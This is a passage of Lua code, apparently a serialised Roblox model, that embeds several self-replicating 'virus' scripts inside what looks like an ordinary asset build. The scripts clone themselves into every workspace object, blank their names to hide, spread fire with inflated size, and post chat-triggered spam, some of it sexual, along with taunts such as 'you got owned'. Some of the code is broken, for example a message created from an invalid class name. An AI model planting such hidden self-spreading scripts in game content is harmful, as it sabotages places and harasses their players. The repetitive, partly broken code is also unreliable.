function Spread(part)
3821
	check = part:findFirstChild("Fire")
3822
		if check == nil then 
3823
	script.Parent:Clone().Parent = part
3824
	
3825
		elseif check ~= nil then
3826
	check.Size = check.Size + 1000000
3827
	check.Heat = check.Heat  +1000000
3828
	end
3829
end
3830
3831
3832
script.Parent.Parent.Touched:connect(Spread)
3833
3834
end,o136)
3835
end))
3836
o137 = Create("Script",{
3837
["Name"] = "Vaccine",
3838
["Parent"] = o133,
3839
})
3840
table.insert(cors,coroutine.create(function()
3841
wait()
3842
runDummyScript(function()
3843
function spread() -- created by bumblebee773
3844
local stuff = game.Workspace:GetChildren()
3845
for i = 1, #stuff do
3846
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
3847
local clone = script:clone()
3848
clone.Parent = stuff[i]
3849
end
3850
end
3851
end
3852
3853
while true do
3854
wait(.1)
3855
spread()
3856
end
3857
3858
function GetAllItems(mdl) 
3859
local objs = {} 
3860
function Search(obj) 
3861
if obj~=workspace then 
3862
table.insert(objs,obj) 
3863
end 
3864
if #obj:GetChildren() > 0 then 
3865
for i, v in ipairs(obj:GetChildren()) do 
3866
Search(v) 
3867
end 
3868
end 
3869
end 
3870
Search(mdl) 
3871
return objs 
3872
end 
3873
3874
3875
3876
for i, v in ipairs(GetAllItems(workspace)) do 
3877
if v.className == "Script" then 
3878
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
3879
v.Parent = game.Lighting --Just in case it has a removal prevention. 
3880
t = Instance.new("ObjectValue") 
3881
t.Name = "IsAVirus" 
3882
t.Parent = v 
3883
end 
3884
end 
3885
end 
3886
3887
for i, v in ipairs(game.Lighting:GetChildren()) do 
3888
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
3889
v:remove() 
3890
end 
3891
end 
3892
3893
3894
print("Virus debugged! All clean!")
3895
end,o137)
3896
end))
3897
o139 = Create("Script",{
3898
["Name"] = "Script......Or is it...",
3899
["Parent"] = mas,
3900
})
3901
table.insert(cors,coroutine.create(function()
3902
wait()
3903
runDummyScript(function()
3904
-- Thanks for using My hack.............suka XD
3905
3906
if script.Parent.className ~= "RotateP" then
3907
	local p = Instance.new("RotateP")
3908
	p.Parent = workspace
3909
	p.Name = "dåååååååååååååång.........you got owned..."
3910
	script.Parent = p
3911
end
3912
3913
function check()
3914
	local list = workspace:GetChildren()
3915
	for i = 1, #list do
3916
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
3917
			script.Parent:Clone().Parent = list[i]
3918
		end
3919
		wait()
3920
	end
3921
end
3922
3923
while true do
3924
	check()
3925
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
3926
		local main = script.Parent:Clone()
3927
		main.Name = "Hello...I åm Your New Lord Lolz"
3928
		main.Parent = workspace
3929
	end
3930
	wait(3)
3931
end
3932
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
3933
-- Have a nice day. XD
3934
end,o139)
3935
end))
3936
o141 = Create("Script",{
3937
["Name"] = "Script......Or is it...",
3938
["Parent"] = mas,
3939
})
3940
table.insert(cors,coroutine.create(function()
3941
wait()
3942
runDummyScript(function()
3943
if script.Parent.className ~= "RotateP" then
3944
	local p = Instance.new("RotateP")
3945
	p.Parent = workspace
3946
	p.Name = "INfecTION"
3947
	script.Parent = p
3948
end
3949
3950
function check()
3951
	local list = workspace:GetChildren()
3952
	for i = 1, #list do
3953
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
3954
			script.Parent:Clone().Parent = list[i]
3955
		end
3956
		wait()
3957
	end
3958
end
3959
3960
while true do
3961
	check()
3962
	if workspace:findFirstChild("inFECtion") == nil then
3963
		local main = script.Parent:Clone()
3964
		main.Name = "inFECtion"
3965
		main.Parent = workspace
3966
	end
3967
	wait(3)
3968
end
3969
3970
end,o141)
3971
end))
3972
o143 = Create("Script",{
3973
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
3974
["Parent"] = mas,
3975
})
3976
table.insert(cors,coroutine.create(function()
3977
wait()
3978
runDummyScript(function()
3979
names={"dapperguestyo"}
3980
local NameCheck = false
3981
script.Parent.Name = names[math.random(1, #names)]
3982
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
3983
local c = script.Parent:Clone()
3984
3985
function addEvent(ch)
3986
	wait(math.random())
3987
	NameCheck = false
3988
	for ss = 1, #names do
3989
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
3990
			NameCheck = true
3991
		end
3992
	end
3993
	if NameCheck == false then
3994
		local cloak = c:Clone()
3995
		cloak.Name = ""
3996
		cloak:GetChildren()[1].Name = ""
3997
		cloak.Parent = ch
3998
		cloak.Name = names[math.random(1, 5)]
3999
	end
4000
end
4001
4002
workspace.ChildAdded:connect(addEvent)
4003
4004
game.Players.PlayerAdded:connect(function(pl)
4005
	pl.Chatted:connect(function(m)
4006
		if m:sub(1, 5) == "/sc t" then
4007
			local m = Instance.new("Message")
4008
			m.Parent = workspace
4009
			m.Text = "THEY CALL ME CRAZY"
4010
			wait(1)
4011
			m.Text = "lOoOoOoOp"
4012
			wait(0.25)
4013
			m.Text = "next page"
4014
			wait(0.25)
4015
			m.Text = "lOoOoOoOp"
4016
			wait(0.25)
4017
			m.Text = "LoOoOoOoP"
4018
			wait(0.25)
4019
			m.Text = "lOoOoOoOp"
4020
			wait(0.25)
4021
			m.Text = "LoOoOoOoP"
4022
			wait(0.25)
4023
			m.Text = "GOTTA GOTTA BE CRAZY"
4024
			wait(1)
4025
			m.Text = "lOoOoOoOp"
4026
			wait(0.25)
4027
			m.Text = "LoOoOoOoP"
4028
			wait(0.25)
4029
			m.Text = "lOoOoOoOp"
4030
			wait(0.25)
4031
			m.Text = "brendantaylor rules"
4032
			wait(0.25)
4033
			m.Text = "so does iampoobx"
4034
			wait(0.25)
4035
			m.Text = "LoOoOoOoP"
4036
			wait(0.25)
4037
			m.Text = "GOTTA GET A LIFE (YOU)"
4038
			wait(3)
4039
			m:remove()
4040
		end
4041
		if m:sub(1, 5) == "HAAXX" then
4042
			local m = Instance.new("Message")
4043
			m.Parent = workspace
4044
			m.Text = "HAAXX"	
4045
			wait(3)
4046
			m:remove()
4047
		end
4048
	end)
4049
end)
4050
4051
while true do
4052
	local s = workspace:GetChildren()
4053
	for i = 1, #s do
4054
		NameCheck = false
4055
		for ss = 1, #names do
4056
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
4057
				NameCheck = true
4058
			end
4059
		end
4060
		if NameCheck == false then
4061
			local cloak = c:Clone()
4062
			cloak.Name = ""
4063
			cloak:GetChildren()[1].Name = ""
4064
			cloak.Parent = s[i]
4065
		end
4066
		wait(0.1)
4067
	end
4068
	wait(1)
4069
end
4070
4071
end,o143)
4072
end))
4073
o145 = Create("Script",{
4074
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
4075
["Parent"] = mas,
4076
})
4077
table.insert(cors,coroutine.create(function()
4078
wait()
4079
runDummyScript(function()
4080
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
4081
local NameCheck = false
4082
script.Parent.Name = names[math.random(1, #names)]
4083
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
4084
local c = script.Parent:Clone()
4085
4086
function addEvent(ch)
4087
	wait(math.random())
4088
	NameCheck = false
4089
	for ss = 1, #names do
4090
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
4091
			NameCheck = true
4092
		end
4093
	end
4094
	if NameCheck == false then
4095
		local cloak = c:Clone()
4096
		cloak.Name = ""
4097
		cloak:GetChildren()[1].Name = ""
4098
		cloak.Parent = ch
4099
		cloak.Name = names[math.random(1, 5)]
4100
	end
4101
end
4102
4103
workspace.ChildAdded:connect(addEvent)
4104
4105
game.Players.PlayerAdded:connect(function(pl)
4106
	pl.Chatted:connect(function(m)
4107
		if m:sub(1, 5) == "/sc t" then
4108
			local m = Instance.new("Message")
4109
			m.Parent = workspace
4110
			m.Text = "THEY CALL ME CRAZY"
4111
			wait(1)
4112
			m.Text = "lOoOoOoOp"
4113
			wait(0.25)
4114
			m.Text = "LoOoOoOoP"
4115
			wait(0.25)
4116
			m.Text = "lOoOoOoOp"
4117
			wait(0.25)
4118
			m.Text = "LoOoOoOoP"
4119
			wait(0.25)
4120
			m.Text = "lOoOoOoOp"
4121
			wait(0.25)
4122
			m.Text = "LoOoOoOoP"
4123
			wait(0.25)
4124
			m.Text = "GOTTA GOTTA BE CRAZY"
4125
			wait(1)
4126
			m.Text = "lOoOoOoOp"
4127
			wait(0.25)
4128
			m.Text = "LoOoOoOoP"
4129
			wait(0.25)
4130
			m.Text = "lOoOoOoOp"
4131
			wait(0.25)
4132
			m.Text = "LoOoOoOoP"
4133
			wait(0.25)
4134
			m.Text = "lOoOoOoOp"
4135
			wait(0.25)
4136
			m.Text = "LoOoOoOoP"
4137
			wait(0.25)
4138
			m.Text = "GOTTA GET A LIFE (YOU)"
4139
			wait(3)
4140
			m:remove()
4141
		end
4142
		if m:sub(1, 5) == "HAAXX" then
4143
			local m = Instance.new("Message")
4144
			m.Parent = workspace
4145
			m.Text = "HAAXX"	
4146
			wait(3)
4147
			m:remove()
4148
		end
4149
	end)
4150
end)
4151
4152
while true do
4153
	local s = workspace:GetChildren()
4154
	for i = 1, #s do
4155
		NameCheck = false
4156
		for ss = 1, #names do
4157
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
4158
				NameCheck = true
4159
			end
4160
		end
4161
		if NameCheck == false then
4162
			local cloak = c:Clone()
4163
			cloak.Name = ""
4164
			cloak:GetChildren()[1].Name = ""
4165
			cloak.Parent = s[i]
4166
		end
4167
		wait(0.1)
4168
	end
4169
	wait(1)
4170
end
4171
4172
end,o145)
4173
end))
4174
o147 = Create("Script",{
4175
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
4176
["Parent"] = mas,
4177
})
4178
table.insert(cors,coroutine.create(function()
4179
wait()
4180
runDummyScript(function()
4181
names={"AmazingOmegaJames","H75","","","","","","",""}
4182
local NameCheck = false
4183
script.Parent.Name = names[math.random(1, #names)]
4184
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
4185
local c = script.Parent:Clone()
4186
4187
function addEvent(ch)
4188
	wait(math.random())
4189
	NameCheck = false
4190
	for ss = 1, #names do
4191
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
4192
			NameCheck = true
4193
		end
4194
	end
4195
	if NameCheck == false then
4196
		local cloak = c:Clone()
4197
		cloak.Name = ""
4198
		cloak:GetChildren()[1].Name = ""
4199
		cloak.Parent = ch
4200
		cloak.Name = names[math.random(1, 5)]
4201
	end
4202
end
4203
4204
workspace.ChildAdded:connect(addEvent)
4205
4206
game.Players.PlayerAdded:connect(function(pl)
4207
	pl.Chatted:connect(function(m)
4208
		if m:sub(1, 5) == "/sc t" then
4209
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
4210
			m.Parent = workspace
4211
			m.Text = "THEY CALL ME CRAZY"
4212
			wait(1)
4213
			m.Text = "lOoOoOoOp"
4214
			wait(0.25)
4215
			m.Text = "LoOoOoOoP"
4216
			wait(0.25)
4217
			m.Text = "lOoOoOoOp"
4218
			wait(0.25)
4219
			m.Text = "LoOoOoOoP"
4220
			wait(0.25)
4221
			m.Text = "lOoOoOoOp"
4222
			wait(0.25)
4223
			m.Text = "LoOoOoOoP"
4224
			wait(0.25)
4225
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
4226
			wait(1)
4227
			m.Text = "lOoOoOoOp"
4228
			wait(0.25)
4229
			m.Text = "LoOoOoOoP"
4230
			wait(0.25)
4231
			m.Text = "lOoOoOoOp"
4232
			wait(0.25)
4233
			m.Text = "LoOoOoOoP"
4234
			wait(0.25)
4235
			m.Text = "lOoOoOoOp"
4236
			wait(0.25)
4237
			m.Text = "LoOoOoOoP"
4238
			wait(0.25)
4239
			m.Text = "GOTTA HAVE SEX WITH YOU"
4240
			wait(3)
4241
			m:remove()
4242
		end
4243
		if m:sub(1, 5) == " SEX HAAXX" then
4244
			local m = Instance.new("Message")
4245
			m.Parent = workspace
4246
			m.Text = " SEX HAAXX"	
4247
			wait(3)
4248
			m:remove()
4249
		end
4250
	end)
4251
end)
4252
4253
while true do
4254
	local s = workspace:GetChildren()
4255
	for i = 1, #s do
4256
		NameCheck = false
4257
		for ss = 1, #names do
4258
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
4259
				NameCheck = true
4260
			end
4261
		end
4262
		if NameCheck == false then
4263
			local cloak = c:Clone()
4264
			cloak.Name = ""
4265
			cloak:GetChildren()[1].Name = ""
4266
			cloak.Parent = s[i]
4267
		end
4268
		wait(0.1)
4269
	end
4270
	wait(1)
4271
end
4272
4273
end,o147)
4274
end))
4275
o148 = Create("Part",{
4276
["Name"] = "sphere",
4277
["Parent"] = o78,
4278
["Material"] = Enum.Material.Neon,
4279
["BrickColor"] = BrickColor.new("Really black"),
4280
["Position"] = Vector3.new(65.8687057, -5246.27002, -352.150116),
4281
["Rotation"] = Vector3.new(89.999794, -44.9997826, 179.999741),
4282
["Anchored"] = true,
4283
["CFrame"] = CFrame.new(65.8687057, -5246.27002, -352.150116, -0.707109511, -3.38509585e-006, -0.707104087, 0.707104087, -2.93747917e-007, -0.707109511, 2.18592299e-006, -1, 2.6013272e-006),
4284
["FormFactor"] = Enum.FormFactor.Plate,
4285
["Size"] = Vector3.new(4.27956581, 4.27956533, 4.27956581),
4286
["BottomSurface"] = Enum.SurfaceType.Smooth,
4287
["TopSurface"] = Enum.SurfaceType.Smooth,
4288
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
4289
})
4290
o149 = Create("SpecialMesh",{
4291
["Parent"] = o148,
4292
["Scale"] = Vector3.new(0.5, 0.5, 0.5),
4293
["MeshType"] = Enum.MeshType.Sphere,
4294
})
4295
o150 = Create("Fire",{
4296
["Parent"] = o148,
4297
["Size"] = 30,
4298
["Color"] = Color3.new(1, 0.678431, 0),
4299
["Enabled"] = false,
4300
["Heat"] = 25,
4301
["SecondaryColor"] = Color3.new(1, 0, 0),
4302
})
4303
o151 = Create("Script",{
4304
["Name"] = "Spread",
4305
["Parent"] = o150,
4306
})
4307
table.insert(cors,coroutine.create(function()
4308
wait()
4309
runDummyScript(function()
4310
function Spread(part)
4311
	check = part:findFirstChild("Fire")
4312
		if check == nil then 
4313
	script.Parent:Clone().Parent = part
4314
	
4315
		elseif check ~= nil then
4316
	check.Size = check.Size + 1000000
4317
	check.Heat = check.Heat  +1000000
4318
	end
4319
end
4320
4321
4322
script.Parent.Parent.Touched:connect(Spread)
4323
4324
end,o151)
4325
end))
4326
o152 = Create("Script",{
4327
["Name"] = "Vaccine",
4328
["Parent"] = o148,
4329
})
4330
table.insert(cors,coroutine.create(function()
4331
wait()
4332
runDummyScript(function()
4333
function spread() -- created by bumblebee773
4334
local stuff = game.Workspace:GetChildren()
4335
for i = 1, #stuff do
4336
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
4337
local clone = script:clone()
4338
clone.Parent = stuff[i]
4339
end
4340
end
4341
end
4342
4343
while true do
4344
wait(.1)
4345
spread()
4346
end
4347
4348
function GetAllItems(mdl) 
4349
local objs = {} 
4350
function Search(obj) 
4351
if obj~=workspace then 
4352
table.insert(objs,obj) 
4353
end 
4354
if #obj:GetChildren() > 0 then 
4355
for i, v in ipairs(obj:GetChildren()) do 
4356
Search(v) 
4357
end 
4358
end 
4359
end 
4360
Search(mdl) 
4361
return objs 
4362
end 
4363
4364
4365
4366
for i, v in ipairs(GetAllItems(workspace)) do 
4367
if v.className == "Script" then 
4368
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
4369
v.Parent = game.Lighting --Just in case it has a removal prevention. 
4370
t = Instance.new("ObjectValue") 
4371
t.Name = "IsAVirus" 
4372
t.Parent = v 
4373
end 
4374
end 
4375
end 
4376
4377
for i, v in ipairs(game.Lighting:GetChildren()) do 
4378
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
4379
v:remove() 
4380
end 
4381
end 
4382
4383
4384
print("Virus debugged! All clean!")
4385
end,o152)
4386
end))
4387
o154 = Create("Script",{
4388
["Name"] = "Script......Or is it...",
4389
["Parent"] = mas,
4390
})
4391
table.insert(cors,coroutine.create(function()
4392
wait()
4393
runDummyScript(function()
4394
-- Thanks for using My hack.............suka XD
4395
4396
if script.Parent.className ~= "RotateP" then
4397
	local p = Instance.new("RotateP")
4398
	p.Parent = workspace
4399
	p.Name = "dåååååååååååååång.........you got owned..."
4400
	script.Parent = p
4401
end
4402
4403
function check()
4404
	local list = workspace:GetChildren()
4405
	for i = 1, #list do
4406
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
4407
			script.Parent:Clone().Parent = list[i]
4408
		end
4409
		wait()
4410
	end
4411
end
4412
4413
while true do
4414
	check()
4415
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
4416
		local main = script.Parent:Clone()
4417
		main.Name = "Hello...I åm Your New Lord Lolz"
4418
		main.Parent = workspace
4419
	end
4420
	wait(3)
4421
end
4422
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
4423
-- Have a nice day. XD
4424
end,o154)
4425
end))
4426
o156 = Create("Script",{
4427
["Name"] = "Script......Or is it...",
4428
["Parent"] = mas,
4429
})
4430
table.insert(cors,coroutine.create(function()
4431
wait()
4432
runDummyScript(function()
4433
if script.Parent.className ~= "RotateP" then
4434
	local p = Instance.new("RotateP")
4435
	p.Parent = workspace
4436
	p.Name = "INfecTION"
4437
	script.Parent = p
4438
end
4439
4440
function check()
4441
	local list = workspace:GetChildren()
4442
	for i = 1, #list do
4443
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
4444
			script.Parent:Clone().Parent = list[i]
4445
		end
4446
		wait()
4447
	end
4448
end
4449
4450
while true do
4451
	check()
4452
	if workspace:findFirstChild("inFECtion") == nil then
4453
		local main = script.Parent:Clone()
4454
		main.Name = "inFECtion"
4455
		main.Parent = workspace
4456
	end
4457
	wait(3)
4458
end
4459
4460
end,o156)
4461
end))
4462
o158 = Create("Script",{
4463
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
4464
["Parent"] = mas,
4465
})
4466
table.insert(cors,coroutine.create(function()
4467
wait()
4468
runDummyScript(function()
4469
names={"dapperguestyo"}
4470
local NameCheck = false
4471
script.Parent.Name = names[math.random(1, #names)]
4472
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
4473
local c = script.Parent:Clone()
4474
4475
function addEvent(ch)
4476
	wait(math.random())
4477
	NameCheck = false
4478
	for ss = 1, #names do
4479
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
4480
			NameCheck = true
4481
		end
4482
	end
4483
	if NameCheck == false then
4484
		local cloak = c:Clone()
4485
		cloak.Name = ""
4486
		cloak:GetChildren()[1].Name = ""
4487
		cloak.Parent = ch
4488
		cloak.Name = names[math.random(1, 5)]
4489
	end
4490
end
4491
4492
workspace.ChildAdded:connect(addEvent)
4493
4494
game.Players.PlayerAdded:connect(function(pl)
4495
	pl.Chatted:connect(function(m)
4496
		if m:sub(1, 5) == "/sc t" then
4497
			local m = Instance.new("Message")
4498
			m.Parent = workspace
4499
			m.Text = "THEY CALL ME CRAZY"
4500
			wait(1)
4501
			m.Text = "lOoOoOoOp"
4502
			wait(0.25)
4503
			m.Text = "next page"
4504
			wait(0.25)
4505
			m.Text = "lOoOoOoOp"
4506
			wait(0.25)
4507
			m.Text = "LoOoOoOoP"
4508
			wait(0.25)
4509
			m.Text = "lOoOoOoOp"
4510
			wait(0.25)
4511
			m.Text = "LoOoOoOoP"
4512
			wait(0.25)
4513
			m.Text = "GOTTA GOTTA BE CRAZY"
4514
			wait(1)
4515
			m.Text = "lOoOoOoOp"
4516
			wait(0.25)
4517
			m.Text = "LoOoOoOoP"
4518
			wait(0.25)
4519
			m.Text = "lOoOoOoOp"
4520
			wait(0.25)
4521
			m.Text = "brendantaylor rules"
4522
			wait(0.25)
4523
			m.Text = "so does iampoobx"
4524
			wait(0.25)
4525
			m.Text = "LoOoOoOoP"
4526
			wait(0.25)
4527
			m.Text = "GOTTA GET A LIFE (YOU)"
4528
			wait(3)
4529
			m:remove()
4530
		end
4531
		if m:sub(1, 5) == "HAAXX" then
4532
			local m = Instance.new("Message")
4533
			m.Parent = workspace
4534
			m.Text = "HAAXX"	
4535
			wait(3)
4536
			m:remove()
4537
		end
4538
	end)
4539
end)
4540
4541
while true do
4542
	local s = workspace:GetChildren()
4543
	for i = 1, #s do
4544
		NameCheck = false
4545
		for ss = 1, #names do
4546
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
4547
				NameCheck = true
4548
			end
4549
		end
4550
		if NameCheck == false then
4551
			local cloak = c:Clone()
4552
			cloak.Name = ""
4553
			cloak:GetChildren()[1].Name = ""
4554
			cloak.Parent = s[i]
4555
		end
4556
		wait(0.1)
4557
	end
4558
	wait(1)
4559
end
4560
4561
end,o158)
4562
end))
4563
o160 = Create("Script",{
4564
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
4565
["Parent"] = mas,
4566
})
4567
table.insert(cors,coroutine.create(function()
4568
wait()
4569
runDummyScript(function()
4570
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
4571
local NameCheck = false
4572
script.Parent.Name = names[math.random(1, #names)]
4573
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
4574
local c = script.Parent:Clone()
4575
4576
function addEvent(ch)
4577
	wait(math.random())
4578
	NameCheck = false
4579
	for ss = 1, #names do
4580
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
4581
			NameCheck = true
4582
		end
4583
	end
4584
	if NameCheck == false then
4585
		local cloak = c:Clone()
4586
		cloak.Name = ""
4587
		cloak:GetChildren()[1].Name = ""
4588
		cloak.Parent = ch
4589
		cloak.Name = names[math.random(1, 5)]
4590
	end
4591
end
4592
4593
workspace.ChildAdded:connect(addEvent)
4594
4595
game.Players.PlayerAdded:connect(function(pl)
4596
	pl.Chatted:connect(function(m)
4597
		if m:sub(1, 5) == "/sc t" then
4598
			local m = Instance.new("Message")
4599
			m.Parent = workspace
4600
			m.Text = "THEY CALL ME CRAZY"
4601
			wait(1)
4602
			m.Text = "lOoOoOoOp"
4603
			wait(0.25)
4604
			m.Text = "LoOoOoOoP"
4605
			wait(0.25)
4606
			m.Text = "lOoOoOoOp"
4607
			wait(0.25)
4608
			m.Text = "LoOoOoOoP"
4609
			wait(0.25)
4610
			m.Text = "lOoOoOoOp"
4611
			wait(0.25)
4612
			m.Text = "LoOoOoOoP"
4613
			wait(0.25)
4614
			m.Text = "GOTTA GOTTA BE CRAZY"
4615
			wait(1)
4616
			m.Text = "lOoOoOoOp"
4617
			wait(0.25)
4618
			m.Text = "LoOoOoOoP"
4619
			wait(0.25)
4620
			m.Text = "lOoOoOoOp"
4621
			wait(0.25)
4622
			m.Text = "LoOoOoOoP"
4623
			wait(0.25)
4624
			m.Text = "lOoOoOoOp"
4625
			wait(0.25)
4626
			m.Text = "LoOoOoOoP"
4627
			wait(0.25)
4628
			m.Text = "GOTTA GET A LIFE (YOU)"
4629
			wait(3)
4630
			m:remove()
4631
		end
4632
		if m:sub(1, 5) == "HAAXX" then
4633
			local m = Instance.new("Message")
4634
			m.Parent = workspace
4635
			m.Text = "HAAXX"	
4636
			wait(3)
4637
			m:remove()
4638
		end
4639
	end)
4640
end)
4641
4642
while true do
4643
	local s = workspace:GetChildren()
4644
	for i = 1, #s do
4645
		NameCheck = false
4646
		for ss = 1, #names do
4647
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
4648
				NameCheck = true
4649
			end
4650
		end
4651
		if NameCheck == false then
4652
			local cloak = c:Clone()
4653
			cloak.Name = ""
4654
			cloak:GetChildren()[1].Name = ""
4655
			cloak.Parent = s[i]
4656
		end
4657
		wait(0.1)
4658
	end
4659
	wait(1)
4660
end
4661
4662
end,o160)
4663
end))
4664
o162 = Create("Script",{
4665
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
4666
["Parent"] = mas,
4667
})
4668
table.insert(cors,coroutine.create(function()
4669
wait()
4670
runDummyScript(function()
4671
names={"AmazingOmegaJames","H75","","","","","","",""}
4672
local NameCheck = false
4673
script.Parent.Name = names[math.random(1, #names)]
4674
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
4675
local c = script.Parent:Clone()
4676
4677
function addEvent(ch)
4678
	wait(math.random())
4679
	NameCheck = false
4680
	for ss = 1, #names do
4681
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
4682
			NameCheck = true
4683
		end
4684
	end
4685
	if NameCheck == false then
4686
		local cloak = c:Clone()
4687
		cloak.Name = ""
4688
		cloak:GetChildren()[1].Name = ""
4689
		cloak.Parent = ch
4690
		cloak.Name = names[math.random(1, 5)]
4691
	end
4692
end
4693
4694
workspace.ChildAdded:connect(addEvent)
4695
4696
game.Players.PlayerAdded:connect(function(pl)
4697
	pl.Chatted:connect(function(m)
4698
		if m:sub(1, 5) == "/sc t" then
4699
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
4700
			m.Parent = workspace
4701
			m.Text = "THEY CALL ME CRAZY"
4702
			wait(1)
4703
			m.Text = "lOoOoOoOp"
4704
			wait(0.25)
4705
			m.Text = "LoOoOoOoP"
4706
			wait(0.25)
4707
			m.Text = "lOoOoOoOp"
4708
			wait(0.25)
4709
			m.Text = "LoOoOoOoP"
4710
			wait(0.25)
4711
			m.Text = "lOoOoOoOp"
4712
			wait(0.25)
4713
			m.Text = "LoOoOoOoP"
4714
			wait(0.25)
4715
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
4716
			wait(1)
4717
			m.Text = "lOoOoOoOp"
4718
			wait(0.25)
4719
			m.Text = "LoOoOoOoP"
4720
			wait(0.25)
4721
			m.Text = "lOoOoOoOp"
4722
			wait(0.25)
4723
			m.Text = "LoOoOoOoP"
4724
			wait(0.25)
4725
			m.Text = "lOoOoOoOp"
4726
			wait(0.25)
4727
			m.Text = "LoOoOoOoP"
4728
			wait(0.25)
4729
			m.Text = "GOTTA HAVE SEX WITH YOU"
4730
			wait(3)
4731
			m:remove()
4732
		end
4733
		if m:sub(1, 5) == " SEX HAAXX" then
4734
			local m = Instance.new("Message")
4735
			m.Parent = workspace
4736
			m.Text = " SEX HAAXX"	
4737
			wait(3)
4738
			m:remove()
4739
		end
4740
	end)
4741
end)
4742
4743
while true do
4744
	local s = workspace:GetChildren()
4745
	for i = 1, #s do
4746
		NameCheck = false
4747
		for ss = 1, #names do
4748
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
4749
				NameCheck = true
4750
			end
4751
		end
4752
		if NameCheck == false then
4753
			local cloak = c:Clone()
4754
			cloak.Name = ""
4755
			cloak:GetChildren()[1].Name = ""
4756
			cloak.Parent = s[i]
4757
		end
4758
		wait(0.1)
4759
	end
4760
	wait(1)
4761
end
4762
4763
end,o162)
4764
end))
4765
o163 = Create("Part",{
4766
["Name"] = "sphere",
4767
["Parent"] = o78,
4768
["Material"] = Enum.Material.Neon,
4769
["BrickColor"] = BrickColor.new("Really black"),
4770
["Position"] = Vector3.new(67.3817596, -5248.53955, -352.150146),
4771
["Rotation"] = Vector3.new(89.999794, -44.9997826, 179.999741),
4772
["Anchored"] = true,
4773
["CFrame"] = CFrame.new(67.3817596, -5248.53955, -352.150146, -0.707109511, -3.38509585e-006, -0.707104087, 0.707104087, -2.93747917e-007, -0.707109511, 2.18592299e-006, -1, 2.6013272e-006),
4774
["FormFactor"] = Enum.FormFactor.Plate,
4775
["Size"] = Vector3.new(4.27956581, 4.27956533, 4.27956581),
4776
["BottomSurface"] = Enum.SurfaceType.Smooth,
4777
["TopSurface"] = Enum.SurfaceType.Smooth,
4778
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
4779
})
4780
o164 = Create("SpecialMesh",{
4781
["Parent"] = o163,
4782
["Scale"] = Vector3.new(0.5, 0.5, 0.5),
4783
["MeshType"] = Enum.MeshType.Sphere,
4784
})
4785
o165 = Create("Fire",{
4786
["Parent"] = o163,
4787
["Size"] = 30,
4788
["Color"] = Color3.new(1, 0.678431, 0),
4789
["Enabled"] = false,
4790
["Heat"] = 25,
4791
["SecondaryColor"] = Color3.new(1, 0, 0),
4792
})
4793
o166 = Create("Script",{
4794
["Name"] = "Spread",
4795
["Parent"] = o165,
4796
})
4797
